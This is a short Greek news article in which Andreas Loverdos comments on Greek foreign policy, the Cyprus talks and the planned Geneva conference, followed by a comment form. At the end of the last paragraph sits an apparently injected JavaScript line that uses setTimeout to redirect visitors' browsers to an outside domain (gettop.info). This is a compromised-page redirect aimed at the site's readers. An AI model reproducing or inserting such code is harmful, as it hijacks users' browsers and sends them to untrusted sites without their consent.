Λοβέρδος: Λάθος μια συνάντηση Τσίπρα – Ερντογάν πριν από τη διάσκεψη της Γενεύης

0
6

 

Η Δημοκρατική Συμπαράταξη στηρίζει τη σταθερή ελληνική εξωτερική πολιτική, «η Κύπρος αποφασίζει η Ελλάδα συμπαρίσταται», τόνισε σε δηλώσεις του μετά τη συνεδρίαση του Εθνικού Συμβουλίου Εξωτερικής Πολιτικής, ο Ανδρέας Λοβέρδος.

Σε αυτό το πλαίσιο, ο πρώην υπουργός επανέλαβε τις εκπεφρασμένες θέσεις της ΔΗΠΑΡ ως προς το θέμα των ξένων στρατευμάτων, των εγγυήσεων και της ασφάλειας και χαιρέτισε τη «διαφαινόμενη μετατροπή της διάσκεψης της Γενεύης σε πολυμερή, διότι η πενταμερής θα γεννούσε πολλά προβλήματα».

Ωστόσο, ο ίδιος χαρακτήρισε λανθασμένη μια ενδεχόμενη συνάντηση μεταξύ στον Έλληνα πρωθυπουργό και τον Τούρκο Πρόεδρο πριν από τη διάσκεψη της Γενεύης στις 12 Ιανουαρίου.

Παράλληλα, ο βουλευτής του ΠΑΣΟΚ πρότεινε αλλαγή του τρόπου λειτουργίας του Συμβουλίου Εξωτερικής Πολιτικής από την επόμενη συνεδρίαση, «κάτι που έγινε δεκτό», όπως σημείωσε.

Τέλος, εκ μέρους της Δημοκρατικής Συμπαράταξης ο κ. Λοβέρδος πρότεινε «αν δεν υπάρξει άλλο θέμα που θα επιβάλει να συγκροτηθεί πάλι το ΕΣΕΠ, ή πριν από την πολυμερή ή μετά από αυτή, το επόμενο θέμα συνεδρίασης του ΕΣΕΠ να είναι η μετανάστευση και η τρομοκρατία ως θέμα που έχει απόλυτη διασύνδεση». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here